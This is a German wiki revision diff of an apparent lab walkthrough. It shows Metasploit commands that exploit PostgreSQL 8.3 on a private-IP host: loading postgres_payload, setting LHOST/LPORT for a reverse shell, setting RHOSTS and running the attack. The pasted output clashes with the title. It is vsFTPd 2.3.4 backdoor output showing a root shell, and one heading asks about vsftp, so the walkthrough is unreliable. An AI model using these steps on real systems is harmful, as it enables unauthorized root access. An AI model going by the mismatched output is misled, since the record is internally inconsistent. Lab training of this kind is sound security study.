Metasploit postgres exploit: Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
(→info) |
|||
| Zeile 17: | Zeile 17: | ||
=info= | =info= | ||
*msf6 exploit(/linux/postgres/postgres_payload) > info | *msf6 exploit(/linux/postgres/postgres_payload) > info | ||
| + | =Wir setzen LHOST und LPORT= | ||
| + | *msf6 exploit(linux/postgres/postgres_payload) > set LHOST 10.0.10.101 | ||
| + | *msf6 exploit(linux/postgres/postgres_payload) > set LPORT 4444 | ||
| + | |||
=Wir müssen den RHOST setzen= | =Wir müssen den RHOST setzen= | ||
*msf6 exploit(/linux/postgres/postgres_payload) > set RHOSTS 10.0.10.105 | *msf6 exploit(/linux/postgres/postgres_payload) > set RHOSTS 10.0.10.105 | ||
Version vom 19. Oktober 2022, 16:20 Uhr
Gefundene Version
- [*] Nmap: 5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
Gibt es eingebaute Schwachstellen zum vsftp Server?
- msf6 > search postgres
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
13 exploit/linux/postgres/postgres_payload 2007-06-05 excellent Yes PostgreSQL for Linux Payload Execution
Module laden
- msf6 > use exploit/linux/postgres/postgres_payload
info
- msf6 exploit(/linux/postgres/postgres_payload) > info
Wir setzen LHOST und LPORT
- msf6 exploit(linux/postgres/postgres_payload) > set LHOST 10.0.10.101
- msf6 exploit(linux/postgres/postgres_payload) > set LPORT 4444
Wir müssen den RHOST setzen
- msf6 exploit(/linux/postgres/postgres_payload) > set RHOSTS 10.0.10.105
Und Attacke
- msf6 exploit(/linux/postgres/postgres_payload) > run
[*] 10.0.10.105:21 - Banner: 220 (vsFTPd 2.3.4) [*] 10.0.10.105:21 - USER: 331 Please specify the password. [+] 10.0.10.105:21 - Backdoor service has been spawned, handling... [+] 10.0.10.105:21 - UID: uid=0(root) gid=0(root) [*] Found shell.
- Wir haben kein Prompt aber eine Shell